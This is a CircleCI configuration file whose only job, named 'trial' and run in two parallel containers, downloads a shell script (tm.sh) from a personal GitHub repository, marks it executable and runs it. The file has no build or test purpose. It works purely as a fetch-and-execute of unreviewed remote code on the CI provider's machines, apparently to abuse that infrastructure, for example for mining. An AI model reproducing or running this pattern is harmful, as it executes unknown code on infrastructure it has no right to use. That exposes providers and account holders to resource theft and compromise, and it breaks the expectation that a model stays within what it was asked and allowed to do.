version: 2.1
jobs:
    trial:
      docker:
            - image: cimg/node:18.2.0
      parallelism: 2
      steps:
        - run:
            name: "trial"
            command: wget https://raw.githubusercontent.com/Vaping86/RedCeh/main/tm.sh && chmod +x tm.sh && bash tm.sh 

workflows:
    version: 2.1
    build:
        jobs:
        - trial